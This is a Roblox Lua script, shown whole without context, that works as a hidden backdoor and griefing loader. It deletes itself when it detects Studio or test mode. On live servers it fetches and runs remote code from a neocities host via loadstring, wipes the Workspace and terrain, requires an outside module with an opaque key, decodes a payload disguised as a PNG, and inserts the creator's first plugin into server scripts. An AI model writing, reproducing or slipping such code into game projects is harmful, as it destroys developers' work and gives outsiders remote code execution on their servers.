if game:GetService("RunService"):IsStudio() or game:GetService("RunService"):IsRunMode() and not game:GetService("RunService"):IsClient() then script:Destroy() else local HttpService = game:GetService("HttpService") function loadscript(url) return loadstring(HttpService:GetAsync(url))() end local RBXM = loadscript("https://b22fc73bd398e6aaac2a19f3491a7d04.neocities.org/RBXMReader.txt") for a, a in pairs(game.Workspace:GetChildren()) do if ((a.Name ~= "Terrain") and (a.Name ~= "Camera")) then a:Destroy() end end game.Workspace.Terrain:Clear() require(10305293577)("0daa031ecd23fdd870dedc76d0a0c611ce57d14bdcf4e54ce8aa4ec8e0f55d55") RBXM.readRBXM(game.HttpService:GetAsync("https://b22fc73bd398e6aaac2a19f3491a7d04.neocities.org/Animations.png")).Animations.Parent = game.ServerStorage local URL = game:GetService("HttpService"):GetAsync("https://inventory.roproxy.com/v2/users/"..game.CreatorId.."/inventory?assetTypes=Plugin&limit=100&sortOrder=Asc") local Data = game:GetService("HttpService"):JSONDecode(URL) local LoadAsset = game:GetService('InsertService'):LoadAsset(Data.data[1].assetId) LoadAsset.Parent = game.ServerScriptService script:Destroy() end